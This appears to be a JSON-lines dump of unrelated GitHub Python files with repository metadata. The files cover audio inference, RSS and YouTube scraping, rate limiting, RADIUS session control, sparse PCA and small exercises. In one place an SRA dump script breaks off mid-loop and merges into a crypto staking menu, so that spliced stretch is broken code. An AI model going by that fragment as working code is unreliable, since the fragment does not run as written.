processing_1sec(farend_test, near_mic_test, model, device)\n\n\n\n #Предсказание на 6 рандомных сэмплах из датасета Real\n #Задержка 30мс\n #Сигнал обрабатывается каждую секунду, с учетом предыдущих секунд\n for farend, near_mic, target, path_id in tqdm(val_loader):\n farend = farend.to(device, dtype=torch.float)\n near_mic = near_mic.to(device, dtype=torch.float)\n\n pred = processing_signal(farend, near_mic, model, t=1000, device='cpu')\n sf.write(f'./dataset-test-real/pred_cnn/{path_id[0]}_pred.wav', pred.detach().cpu().numpy(), samplerate=16_000)\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"panamka/AEC","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27835643203","text":"\"\"\"\nDefine the class Source responsible for the extraction of article links from rss feeds.\n\"\"\"\n\nimport datetime as dt\nimport time\nimport typing\nimport logging\nimport feedparser\nimport newspaper as np\nfrom newspaper.article import ArticleException\n\nlogger = logging.getLogger('genderednews.rss_source')\nlogger_debug = logging.getLogger('genderednews_debug.rss_source')\n\n\nclass RssSource():\n \"\"\"\n The class Source is responsible for extracting links from rss feeds.\n \"\"\"\n USER_AGENT = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'\n\n def __init__(self, rss_feed_links: typing.List[str], source_name: str) -> None:\n self.rss_feed_links = rss_feed_links\n self.name = source_name\n\n # Config newspaper (to avoid read time out error)\n self.config = np.Config()\n self.config.browser_user_agent = self.USER_AGENT\n self.config.request_timeout = 10\n\n def _scrape_one_xml(self, source_link: str) -> typing.List[typing.Dict]:\n \"\"\"\n Scrape all the articles links from one xml RSS feed.\n \"\"\"\n\n # Parse the xml file\n rss_feed = feedparser.parse(source_link)\n\n for entry in rss_feed.entries:\n # Check if there are missing links\n try:\n if not entry.link:\n raise RuntimeError(\n 'No link for {entry}. 
You can try to look into rss_feed variable.')\n except AttributeError:\n continue\n\n # Conversion of published date in datetime format\n try:\n entry.datetime = dt.datetime.fromtimestamp(\n time.mktime(entry.published_parsed))\n\n # Retrieve published date in the metadata of the article\n except (AttributeError, KeyError):\n article = np.Article(\n entry.link, language='fr', config=self.config)\n try:\n article.download()\n article.parse()\n except ArticleException:\n # Ignore this article (article url not working)\n entry.datetime = dt.datetime.now() - dt.timedelta(days=10)\n continue\n try:\n entry.datetime = article.publish_date.replace(tzinfo=None)\n except AttributeError:\n # Ignore this article (publish_date == None)\n entry.datetime = dt.datetime.now() - dt.timedelta(days=10)\n continue\n\n # Return the entries published yesterday\n return rss_feed.entries\n\n def scrape_all_xml(self) -> typing.List[typing.Dict]:\n \"\"\"\n Return an array of all entries (dict with 'link' & 'date') from this source.\n \"\"\"\n\n article_entries = []\n for feed in self.rss_feed_links:\n newsfeed = self._scrape_one_xml(feed)\n for entry in newsfeed:\n try:\n if entry.link:\n logger_debug.debug(f'Article found: {entry.link}')\n article_entries.append(\n {'link': entry.link, 'date': entry.datetime})\n except AttributeError:\n continue\n logger_debug.debug(f'{len(article_entries)} articles found.')\n\n return article_entries\n\n def get_entries_from_to(self, from_date: dt.datetime, to_date: dt.datetime) -> typing.List[typing.Dict]:\n \"\"\"\n Return an array of entries (dict with 'link' & 'date') from this source that has been published between [from_date, to_date].\n The granularity is at the level of the day.\n \"\"\"\n\n return [entry for entry in self.scrape_all_xml() if from_date.date() <= entry['date'].date() <= to_date.date()]\n\n def get_entries_of_yesterday(self) -> typing.List[typing.Dict]:\n \"\"\"\n Return an array of entries (dict with 'link' & 'date') from this source that has been published yesterday.\n The granularity is at the level of the day.\n \"\"\"\n\n yesterday = dt.datetime.now() - dt.timedelta(days=1)\n return self.get_entries_from_to(yesterday, yesterday)\n","repo_name":"getalp/genderednews","sub_path":"gn_modules/scraping_and_extraction/rss_source.py","file_name":"rss_source.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"41761746146","text":"from apiclient.discovery import build\nimport pandas as pd\nimport time\nfrom conf import conf_sandbox\n\nyoutube = build(\n conf_sandbox[\"youtube\"][\"api_service_name\"],\n conf_sandbox[\"youtube\"][\"api_version\"],\n developerKey=conf_sandbox[\"youtube\"][\"developer_key\"]\n)\n\n\ndef get_videos(youtube, channelId, order):\n search_response = youtube.search().list(\n channelId=channelId,\n type=\"video\",\n part=\"id,snippet\",\n maxResults=50,\n order=order\n ).execute()\n\n return search_response.get(\"items\", [])\n\n\ndef get_comment_threads():\n videos = get_videos(youtube, conf_sandbox[\"youtube\"][\"channel_id\"], \"viewCount\")\n\n temp_comments = []\n for video in videos:\n time.sleep(1.0)\n results = youtube.commentThreads().list(\n part=\"snippet\",\n videoId=video[\"id\"][\"videoId\"],\n textFormat=\"plainText\",\n maxResults=20,\n order='relevance'\n ).execute()\n\n for item in results[\"items\"]:\n comment = item[\"snippet\"][\"topLevelComment\"]\n temp_comments.append(dict(\n 
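# one flat row per top-level comment; replies are only tallied via totalReplyCount\n 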
videoId=video[\"id\"][\"videoId\"],\n videoName=video[\"snippet\"][\"title\"],\n nbrReplies=item[\"snippet\"][\"totalReplyCount\"],\n author=comment[\"snippet\"][\"authorDisplayName\"],\n likes=comment[\"snippet\"][\"likeCount\"],\n publishedAt=comment[\"snippet\"][\"publishedAt\"],\n text=comment[\"snippet\"][\"textDisplay\"].encode('utf-8').strip()\n ))\n\n return temp_comments\n\n\ndef get_video_infos(videos):\n video_list = {}\n for search_result in videos:\n if search_result[\"id\"][\"kind\"] == \"youtube#video\":\n video_list[search_result[\"id\"][\"videoId\"]] = search_result[\"snippet\"][\"title\"]\n\n s = ','.join(video_list.keys())\n videos_list_response = youtube.videos().list(id=s, part='id,statistics').execute()\n res = []\n for i in videos_list_response['items']:\n temp_res = dict(v_title = video_list[i['id']])\n temp_res.update(i['statistics'])\n res.append(temp_res)\n\n data = pd.DataFrame.from_dict(res)\n data['viewCount'] = data['viewCount'].map(lambda x : float(x))\n data['commentCount'] = data['commentCount'].map(lambda x : float(x))\n\n return data\n\n\ndef get_videos_sorted():\n videos = get_videos(youtube, conf_sandbox[\"youtube\"][\"channel_id\"], \"viewCount\")\n videos_data = get_video_infos(videos)\n\n return videos_data.sort_values(by=['viewCount'], ascending=0).head(20)\n","repo_name":"bogatyrjov1/email-sentiment","sub_path":"sandbox/youtube/fetch_videos/fetch_videos.py","file_name":"fetch_videos.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"26064288882","text":"#!/usr/bin/env python3\nfrom subprocess import Popen, PIPE\nimport click\nfrom Queue import Queue, Empty, Full\nfrom threading import Thread, Lock\nfrom time import sleep\n\n#lot of refernce from http://www.troyfawkes.com/learn-python-multithreading-queues-basics/\n#verbatim from http://stackoverflow.com/questions/3185261/python-threading-and-queues-for-infinite-data-input-stream\n\n#dependency vda-dump from SRA toolkit\n\nclass jointRead:\n def __init__(self, inputStream):\n self.readName = inputStream[0]\n self.nt = inputStream[1]\n self.quality = inputStream[3]\n\ndef dump_mate(queue,\n threadId,\n mate1,\n mate2,\n mutex,\n max_batch_size):\n while True:\n try:\n m1 = \"\"\n m2 = \"\"\n batch_size = 0\n while(batch_size \")\n\n if option == '0':\n cprint(f'Exit, bye bye.', 'green')\n break\n\n elif option == '1':\n amount_str = print_input_amounts_range('Deposit amount')\n run_script(stake, 'scroll', amount_str, [])\n break\n\n\n elif option == '2':\n run_script(withdraw, 'scroll',0, [])\n\n break\n\n elif option == '3':\n run_script(claim, 'scroll', 0, [])\n\n break\n\n else:\n cprint(f'Wrong action. 
Please try again.\\n', 'red')\n continue\n except KeyboardInterrupt:\n cprint(f' Exit, bye bye\\n', 'red')\n raise SystemExit\n","repo_name":"darcksday/scroll","sub_path":"modules/contracts/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73069024563","text":"def max_path_sum(tree):\n max_sum_branch, runtime_max_sum = max_path_sum_helper(tree)\n return max(max_sum_branch, runtime_max_sum)\n\ndef max_path_sum_helper(tree):\n if not tree:\n return (0, 0)\n\n left_sum_branch, left_sum = max_path_sum_helper(tree.left)\n right_sum_branch, right_sum = max_path_sum_helper(tree.right)\n max_child_sum_branch = max(left_sum_branch, right_sum_branch)\n max_sum_branch = max(max_child_sum_branch + tree.value, tree.value)\n max_sum = max(max_sum_branch, left_sum_branch + tree.value + right_sum_branch)\n runtime_max_sum = max(left_sum, right_sum, max_sum)\n return max_sum_branch, runtime_max_sum\n\n\nclass BinaryTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n def insert(self, values, i=0):\n if i >= len(values):\n return\n queue = [self]\n while len(queue) > 0:\n current = queue.pop(0)\n if current.left is None:\n current.left = BinaryTree(values[i])\n break\n queue.append(current.left)\n if current.right is None:\n current.right = BinaryTree(values[i])\n break\n queue.append(current.right)\n self.insert(values, i + 1)\n return self\n\n\n# tree1 = BinaryTree(1).insert([2, 3, 4, 5, 6, 7])\n# print(max_path_sum(tree1))\n\ntree2 = BinaryTree(1).insert([2, 3])\nprint(max_path_sum(tree2))\n","repo_name":"chris-peng-1244/python-quiz","sub_path":"max_path_sum.py","file_name":"max_path_sum.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5269787346","text":"\nimport sys\n\nrows = int(input(\"How many rows of boxes? \"))\ncolumns = int(input(\"How many columns of boxes? \"))\nrow_spaces = int(input(\"How many rows of spaces in each box? \"))\ncolumn_spaces = int(input(\"How many columns of spaces in each box (e.g., 3)? 
\"))\n\n\nfor i in range(rows):\n\tfor i in range(columns):\n\t print(\"+\",end=\"\")\n\t for i in range(column_spaces):\n\t print(\"-\",end=\"\")\n\tprint(\"+\")\n\n\tfor spaces in range(row_spaces):\n\t for _ in range(columns):\n\t print(\"|\",end=\"\")\n\n\t for space in range(column_spaces):\n\t print(\" \",end=\"\")\n\t \n\t print(\"|\")\n\nfor i in range(columns):\n print(\"+\",end=\"\")\n for i in range(column_spaces):\n print(\"-\",end=\"\")\nprint(\"+\")\n\n#+ and - are characters\n\nsys.exit(0)\n","repo_name":"sf19pb1-petercooper/graph_paper","sub_path":"graph_paper_1.py","file_name":"graph_paper_1.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6603978772","text":"from flask import Flask, jsonify, request,Response, abort, render_template\nfrom flask import render_template\nfrom config import configLimiter\nimport redis\n\n__version__ = \"1.0.0\"\n\n###########################################\n#Class of limiter\n#Limit requests by Redis db\n\n#If exceed the limit, return 429 \n#and go to error.html\n##########################################\nclass Limiter(object):\n \"\"\"Limit requests number by remote address\"\"\"\n def __init__(self, app):\n #set up redis db\n self._config = configLimiter()\n self.REQUEST_ALLOWED = self._config.requests\n self.TIME_SEESION =self._config.timeSession\n self.FREELIST = self._config.freeList\n self.redisDB = redis.StrictRedis(host=self._config.host, port=self._config.port, password=self._config.passwrd, db=self._config.db, socket_timeout=30)\n @app.errorhandler(429)\n def handle_exception(e):\n \"\"\"Return a HTML page for HTTP error 429.\"\"\"\n self.retryTime = self.redisDB.ttl(request.remote_addr) #get the retry-time from redis\n self.description = \"Rate limit exceeded. 
Try again in \" + str(self.retryTime) + \" seconds\"\n return render_template(\"error.html\", description = self.description, code = e.code, name = e.name), 429\n\n @app.before_request \n def before_request():\n \"\"\"access the db and evaluate whether it reach the limit\"\"\"\n self.ip = request.remote_addr\n if self.ip not in self.FREELIST:\n self.ip_count = self.redisDB.get(self.ip)\n print(\"ip: %s, ip_count: %s\" % (self.ip, self.ip_count))\n if not self.ip_count:\n self.redisDB.set(self.ip, 1,ex=self.TIME_SEESION) # set new key, make it be expired in the period\n else:\n self.redisDB.incr(self.ip) # increase the count of the ip\n if int(self.ip_count) >= self.REQUEST_ALLOWED:\n return abort(429) #if exceed the limit, raise 429 error\n","repo_name":"EvaWw/flaskRateLimiter","sub_path":"rateLimiter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29892971193","text":"import os\nfrom typing import Optional\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework.exceptions import APIException\nfrom rest_framework import status\nfrom pyrad.client import Client, Timeout\nfrom pyrad import packet\nfrom pyrad import dictionary\n\n\noptions = getattr(settings, 'RADIUSAPP_OPTIONS')\nif options is None:\n raise ImproperlyConfigured('You must specified RADIUSAPP_OPTIONS in settings')\n\nADDRESS = options.get('server_host')\nSECRET = options.get('secret')\n\nif not all([ADDRESS, SECRET]):\n raise ImproperlyConfigured(\"You must set 'server_host' and 'secret' options to RADIUSAPP_OPTIONS dict\")\ndel options\n\n\ndef _abspath(fname):\n curdir = os.path.dirname(__file__)\n return os.path.join(curdir, fname)\n\n\nclass RadiusBaseException(APIException):\n pass\n\n\nclass RadiusSessionNotFoundException(RadiusBaseException):\n status_code = status.HTTP_404_NOT_FOUND\n default_detail = _('Radius session not found error')\n\n\nclass RadiusTimeoutException(RadiusBaseException):\n status_code = status.HTTP_408_REQUEST_TIMEOUT\n default_detail = _('Radius timeout error')\n\n\nclass RadiusInvalidRequestException(RadiusBaseException):\n status_code = status.HTTP_400_BAD_REQUEST\n default_detail = _('Radius invalid request')\n\n\nclass RadiusMissingAttributeException(RadiusBaseException):\n status_code = status.HTTP_400_BAD_REQUEST\n default_detail = _('Radius missing attibute')\n\n\nclass RadiusInteract:\n client = Client(server=ADDRESS, secret=SECRET, dict=dictionary.Dictionary(_abspath(\"dictionary\")))\n # client.timeout = 30\n\n def coa_inet2guest(self, uname: str):\n # FIXME: move params to radius config\n attrs = {\n 'User-Name': uname,\n 'ERX-Service-Deactivate': 'SERVICE-INET',\n 'ERX-Service-Activate:1': 'SERVICE-GUEST',\n 'ERX-Service-Acct-Interval:1': 14400,\n 'ERX-Service-Statistics:1': 2\n }\n return self.coa(**attrs)\n\n def coa_guest2inet(self, uname: str, speed_in: int, speed_out: int, speed_in_burst: int, speed_out_burst: int):\n attrs = {\n 'User-Name': uname,\n 'ERX-Service-Deactivate': 'SERVICE-GUEST',\n 'ERX-Service-Activate:1': f'SERVICE-INET({speed_in},{speed_in_burst},{speed_out},{speed_out_burst})',\n 'ERX-Service-Acct-Interval:1': 14400,\n 'ERX-Service-Statistics:1': 2\n }\n return self.coa(**attrs)\n\n def coa(self, **attrs):\n # create coa request\n request = self.client.CreateCoAPacket(**attrs)\n return 
self._process_request(request)\n\n def disconnect(self, uname: str):\n attrs = {\n \"User-Name\": uname\n }\n # create disconnect request\n request = self.client.CreateCoAPacket(code=packet.DisconnectRequest, **attrs)\n return self._process_request(request)\n\n def _process_request(self, request) -> Optional[str]:\n try:\n res = self.client.SendPacket(request)\n if res.code in (packet.CoAACK, packet.AccessAccept, packet.DisconnectACK):\n # ok\n return 'ok'\n res_keys = res.keys()\n exception = None\n if 'Error-Cause' in res_keys:\n errs = res.get('Error-Cause')\n if 'Session-Context-Not-Found' in errs:\n exception = RadiusSessionNotFoundException\n elif 'Invalid-Request' in errs:\n exception = RadiusInvalidRequestException\n elif 'Missing-Attribute' in errs:\n exception = RadiusMissingAttributeException\n\n res_keys.remove('Error-Cause')\n # get err text\n res_text = b'\\n\\n'.join(b'\\n'.join(res.get(i)) for i in res_keys)\n res_text = res_text.decode()\n if exception is not None:\n raise exception(res_text)\n return res_text\n except Timeout as e:\n raise RadiusTimeoutException(e) from e\n\n\n_rad_interact_instance = RadiusInteract()\n\n\ndef _filter_uname(uname: str) -> str:\n _uname = str(uname)\n _uname = _uname.replace('\"', \"\")\n _uname = _uname.replace(\"'\", \"\")\n return _uname\n\n\ndef finish_session(radius_uname: str):\n \"\"\"Send radius disconnect packet to BRAS.\"\"\"\n if not radius_uname:\n return\n uname = _filter_uname(radius_uname)\n return _rad_interact_instance.disconnect(uname=uname)\n\n\ndef change_session_inet2guest(radius_uname: str):\n if not radius_uname:\n return\n uname = _filter_uname(radius_uname)\n # COA inet -> guest\n return _rad_interact_instance.coa_inet2guest(uname=uname)\n\n\ndef change_session_guest2inet(\n radius_uname: str, speed_in: int, speed_out: int, speed_in_burst: int, speed_out_burst: int\n):\n \"\"\"\n Send COA via radclient, change guest service type to inet service type.\n :param radius_uname: User-Name from radius\n :param speed_in: Customer service input speed in bits/s\n :param speed_out: Customer service output speed in bits/s\n :param speed_in_burst: Customer service input speed burst\n :param speed_out_burst: Customer service output speed burst\n :return: boolean, is return code of script is equal 0\n \"\"\"\n if not radius_uname:\n return\n uname = _filter_uname(radius_uname)\n speed_in = int(speed_in)\n speed_out = int(speed_out)\n speed_in_burst, speed_out_burst = int(speed_in_burst), int(speed_out_burst)\n\n # COA guest -> inet\n return _rad_interact_instance.coa_guest2inet(\n uname=uname,\n speed_in=speed_in,\n speed_out=speed_out,\n speed_in_burst=speed_in_burst,\n speed_out_burst=speed_out_burst\n )\n","repo_name":"nerosketch/djing2","sub_path":"apps/networks/radius_commands/radius_commands.py","file_name":"radius_commands.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"29607841947","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def deleteDuplicates(self, head: ListNode) -> ListNode:\n pre = ListNode()\n\n used = set()\n\n cur = head\n rescur = pre\n\n while cur:\n if cur.val not in used and (not cur.next or cur.next.val != cur.val):\n rescur.next = cur\n rescur = rescur.next\n used.add(cur.val)\n cur = cur.next\n rescur.next = None\n\n return 
pre.next","repo_name":"CA2528357431/leetcode-note","sub_path":"LIST1/0267 82.py","file_name":"0267 82.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"29783681948","text":"#!/usr/bin/env python3\n\nimport math\nimport random\n\ndef coumpound_all_prob(prob_list):\n total_prob = 0.0\n l = len(prob_list)\n if(l==1):\n return prob_list[0]\n elif(l==2):\n return 2.0*prob_list[0]*prob_list[1]\n # else recursive step\n for i, el in enumerate(prob_list):\n # create sublist\n sl = prob_list[:]\n sl.pop(i)\n total_prob += el * coumpound_all_prob(sl)\n return total_prob\n\ndef coumpound_all_prob_fact(prob_list, tries):\n if(tries < len(prob_list)):\n return None\n total_prob = 1.0\n for i in prob_list:\n total_prob *= i\n accum_mult = 0.0\n for i in range(tries - len(prob_list)):\n for j in prob_list:\n accum_mult += math.pow(j, 1.0+i)\n fact_num = math.factorial(tries) / math.factorial(1+tries-len(prob_list))\n print(total_prob, accum_mult, tries, fact_num)\n return accum_mult * total_prob * fact_num\n\ndef single_run_mc(prob_list, tries):\n # build a simple list with cumulated values\n accum = 0.0\n a_pl = []\n res_pl = []\n for i in prob_list:\n accum += i\n a_pl.append(accum)\n res_pl.append(0)\n #print(a_pl)\n for i in range(tries):\n cr = random.randint(1, 1000000)/1000000.0\n #print(cr)\n for j in range(len(a_pl)):\n if cr <= a_pl[j]:\n res_pl[j] = 1\n break\n #print(res_pl)\n accum = 0\n for i in res_pl:\n accum += i\n #print(accum >= len(res_pl), \"\\n\")\n return accum >= len(res_pl)\n\ndef coumpound_all_prob_mc(prob_list, tries):\n if(tries < len(prob_list)):\n return None\n total_ok = 0\n samples = 1000000\n i = 0\n while i < samples:\n total_ok += 1 if single_run_mc(prob_list, tries) else 0\n i += 1\n return 1.0 * total_ok / samples\n\ndef main():\n mv = [0.3872, 0.3872, 0.2256]\n #mv = [0.1, 0.1, 0.1]\n n_tries = 5\n print(coumpound_all_prob_fact(mv, n_tries))\n print(coumpound_all_prob_mc(mv, n_tries))\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"Emanem/wfdrops","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"46597169252","text":"# Import all libraries\nimport sys\nfrom ARCHIVE.library import *\nfrom logger import *\n\n\ndef account_verification():\n \"\"\"\n Verifies the account and logs an error message if an exception occurs.\n \"\"\"\n try:\n pass\n except Exception as e:\n logging.error(f\"Unable to verify account! Exception: {e}\")\n sys.exit()\n\n\ndef clear_orders(open_orders):\n \"\"\"\n Clears all open orders and logs information about the process.\n\n Args:\n open_orders: A list of open orders.\n \"\"\"\n logging.info(f\"List of open orders: {open_orders}\")\n\n for order in open_orders:\n logging.info(f\"Closing order {order.id}\")\n\n logging.info(\"Clearing all open orders.\")\n\n\ndef get_ticker():\n \"\"\"\n Prompt the user to enter a ticker symbol and return it.\n\n Returns:\n str: The entered ticker symbol.\n \"\"\"\n ticker = input(\"What ticker do you want to operate with? 
Ticker: \")\n return ticker\n\n\ndef main():\n \"\"\"\n Main function to:\n - Initialize logging\n - Verify the account\n - Clear orders\n - Get the user's desired ticker.\n \"\"\"\n initialize_logging()\n account_verification()\n\n # Example open_orders list for demonstration\n open_orders = []\n clear_orders(open_orders)\n\n ticker = get_ticker()\n\n mytrader = TraderBot(ticker)\n mytrader.run()\n\n print(f\"Operating with ticker: {ticker}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"redayzarra/PocketTrader","sub_path":"ARCHIVE/LoserBot.py","file_name":"LoserBot.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"24476763861","text":"import numpy as np\nimport math\nfrom src.models.counterfactual import CF\nfrom src.optimization.mcts import MCTS\nimport sys\n\nclass MCTSSearch:\n\n def __init__(self, env, bb_model, dataset, obj, params, cfmode, c):\n self.env = env\n self.bb_model = bb_model\n self.dataset = dataset\n self.n_var = env.state_dim\n self.obj = obj\n\n self.n_iter = params['ts_n_iter']\n self.n_expand = params['ts_n_expand']\n self.max_cf_path_len = params['max_cf_path_len']\n self.cfmode = cfmode\n\n self.c = c\n self.action_dic = {0: 'SOUTH', 1: 'NORTH', 2: 'EAST', 3: 'WEST', 4:'PICKUP', 5: 'DROPOFF'}\n \n def generate_counterfactuals(self, fact, target, nbhd=None):\n mcts_solver = MCTS(self.env, self.bb_model, self.obj, fact, target, self.cfmode, c=self.c, max_level=self.max_cf_path_len, n_expand=self.n_expand)\n found = False\n\n tree_size, time = mcts_solver.search(init_state=fact, num_iter=self.n_iter)\n\n all_nodes = self.traverse(mcts_solver.root)\n\n potential_cf = []\n illegal = 0\n \n for n in all_nodes: \n if n.is_terminal():\n if(not(self.env.check_done(n.state)) and self.bb_model.predict(n.state) == target and self.cfmode != \"NETACTION\"):\n n.state_path = [self.env.encode(fact[0],fact[1],fact[2],fact[3])] + n.state_path\n action_path = self.getActionPath(n.prev_actions)\n if(self.cfmode != 'ACTION_CHANGELOC' and self.cfmode != 'ACTION_CHANGEBOTH'):\n if(self.pickuplocchange(n.state_path) == False):\n potential_cf += [CF(n.state, True, n.prev_actions, n.cumulative_reward, n.get_reward(), tree_size, time, n.state_path, len(action_path), action_path)]\n else:\n potential_cf += [CF(n.state, True, n.prev_actions, n.cumulative_reward, n.get_reward(), tree_size, time, n.state_path, len(action_path), action_path)]\n elif(self.cfmode == \"NETACTION\" and self.bb_model.predict(n.state) == self.bb_model.predict(fact) and not(self.env.check_done(n.state))):\n n.state_path = [self.env.encode(fact[0],fact[1],fact[2],fact[3])] + n.state_path\n action_path = self.getActionPath(n.prev_actions)\n potential_cf += [CF(n.state, True, n.prev_actions, n.cumulative_reward, n.get_reward(), tree_size, time, n.state_path, len(action_path), action_path)]\n\n # return only the best one\n print('Found {} counterfactuals'.format(len(potential_cf)))\n\n if len(potential_cf):\n best_cf_ind = np.argmax([cf.value for cf in potential_cf])\n try:\n best_cf = potential_cf[best_cf_ind]\n except IndexError:\n return None\n else:\n return None\n\n \n return best_cf\n \n def traverse(self, root, nodes=None):\n ''' Returns all nodes in the tree '''\n if nodes is None:\n nodes = set()\n\n nodes.add(root)\n \n \n if root.children is not None and len(root.children):\n children = []\n for action in root.children.keys():\n children += root.children[action]\n\n for c in children:\n 
self.traverse(c, nodes)\n        return nodes\n    \n    def getPath(self, child, root, nodes, length):\n        length += [self.env.encode(child.state[0],child.state[1],child.state[2],child.state[3])]\n        if(child == root):\n            return length\n        else:\n            return self.getPath(child.parent, root, nodes, length)\n    \n    def getActionPath(self, path):\n        action_path = []\n        for a in path:\n            action_path += [self.action_dic[a]]\n        return action_path\n\n    def pickuplocchange(self, path):\n        path2 = path.copy()\n        if(len(path2) > 1):\n            s1 = list(self.env.decode(path2.pop(0)))\n            s2 = list(self.env.decode(path2.pop(0)))\n            done = False\n            while not(done):\n                # Passenger state changed without being in the taxi\n                if (s1[2] != s2[2] and s1[2] != 4 and s2[2] != 4):\n                    print(\"PickupChanged: \", s1, s2)\n                    return True\n                if len(path2) == 0:\n                    done = True\n                else:\n                    s1 = s2\n                    s2 = list(self.env.decode(path2.pop(0)))\n        return False","repo_name":"ckenneytcd/Counterfactual-Explanation-GenerationForReinforcementLearning","sub_path":"src/optimization/monte_carlo_cfsearch.py","file_name":"monte_carlo_cfsearch.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"3089633725","text":"from typing import Optional, List\nimport pandas as pd\nimport numpy as np\nfrom feature_engine.selection.base_selector import BaseSelector\nfrom tqdm import tqdm\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.decomposition._sparse_pca import SparsePCA\nfrom sklearn.decomposition._dict_learning import dict_learning\nfrom sklearn.utils.extmath import svd_flip\nfrom sklearn.linear_model import ElasticNet\n\n\nfrom scipy.linalg import sqrtm\nfrom scipy.optimize import minimize\n\nfrom itertools import repeat\n\nfrom multiprocessing import Pool\n\n\nclass EnetSPCA(BaseEstimator, TransformerMixin):\n    \"\"\"\n    SKLearn compatible transformer implementing the SPCA algorithm as described in \"Sparse Principal Component Analysis\" Zou et al (2006)\n    \"\"\"\n    def __init__(self, n_components=20, max_iter=10000, tol=0.00001, alpha = 0.1, l1_ratio = 0.5, use_sklearn = True, n_jobs = 0):\n        self.max_iter = max_iter\n        self.tol = tol\n        self.n_components = n_components\n        self.n_comps = n_components\n        self.alpha = alpha\n        self.l1_ratio = l1_ratio\n        self.n_jobs = n_jobs\n        self.loadings = None\n        self.nonzero = -1\n        self.zero = -1\n        self.totloadings = -1\n        self.use_sklearn = use_sklearn\n        self.pca_loadings = None\n\n    def fit(self, X, y=None, verbose=0):\n        \n        n_jobs = self.n_jobs\n        # Calculate total number of loadings\n        self.totloadings = self.n_components * X.shape[1]\n        self.nonzero = self.totloadings\n\n        # Setup progress bar\n        if verbose:\n            print(\"Progress based on max iterations:\")\n            pbar = tqdm(total=self.max_iter)\n\n        # Convert to numpy array if necessary\n        if isinstance(X, pd.DataFrame):\n            X = X.values\n\n        ## Step 1: Setup first iteration\n        _, _, Vt = np.linalg.svd(X, full_matrices=False)\n        self.pca_loadings = Vt.T[:, :self.n_comps]\n        A = Vt.T[:, :self.n_comps]\n        B = np.zeros((A[:, 0].shape[0], self.n_comps))\n        XtX = X.T @ X\n        Sig_root = sqrtm(XtX)\n        Sig_root = Sig_root.real\n\n        # ElasticNet() is not suitable for alpha = 0, return PCA results\n        if self.alpha == 0:\n            self.loadings = A\n            return self\n\n        # Initialize progress monitors arbitrarily large\n        diff, diff_nonimprove = 100, 0\n        iter = 0\n\n        ## Loop of step 2 and 3 until convergence / maxiter:\n        while (\n            iter < self.max_iter and diff > self.tol and diff_nonimprove < 3\n        ):\n            B_old = np.copy(B)\n\n            ## Update B 
(step 2*)\n\n            # Check if user wants to use sklearn or scipy implementation\n            if self.use_sklearn:\n\n                # Setup parallelization if n_jobs != 0\n                if n_jobs != 0:\n\n                    if n_jobs == -1:\n                        threads = None\n                    else:\n                        threads = n_jobs\n\n                    # Setup thread pool using a starmap\n                    map_arr = list(range(self.n_components))\n                    second_arg = A\n                    third_arg = Sig_root\n                    with Pool(threads) as pool:\n                        B = np.array(\n                            pool.starmap(\n                                self._enet_criterion,\n                                zip(map_arr, repeat(second_arg), repeat(third_arg)),\n                            )\n                        )\n                    B = B.T\n\n                else:\n                    for i in range(self.n_components):\n                        B[:, i] = (\n                            ElasticNet(\n                                alpha=self.alpha, l1_ratio=self.l1_ratio, fit_intercept=False, max_iter=14000\n                            )\n                            .fit(Sig_root, Sig_root @ A[:, i])\n                            .coef_\n                        )\n\n            else:\n                # SciPy implementation, essentially not runnable due to time constraints.\n                for i in range(self.n_comps):\n                    # minimize returns an OptimizeResult; keep only the solution vector\n                    B[:, i] = minimize(self._criterion, np.zeros(A[:, i].shape[0]), args=(XtX, A[:, i])).x\n                    # print(i)\n\n            # Monitor change\n            diff_old = diff\n            diff = np.linalg.norm(np.abs(B - B_old))\n            if diff_old < diff:\n                diff_nonimprove += 1\n\n            # print(diff)\n\n            # Update A (step 3)\n            # A_old = A\n            Un, s, Vnt = np.linalg.svd(XtX @ B, full_matrices=False)\n            A = Un @ Vnt\n\n            iter = iter + 1\n            if verbose:\n                pbar.update(1)\n\n        if verbose:\n            pbar.close()\n\n        # Normalize loadings after loop\n        B = 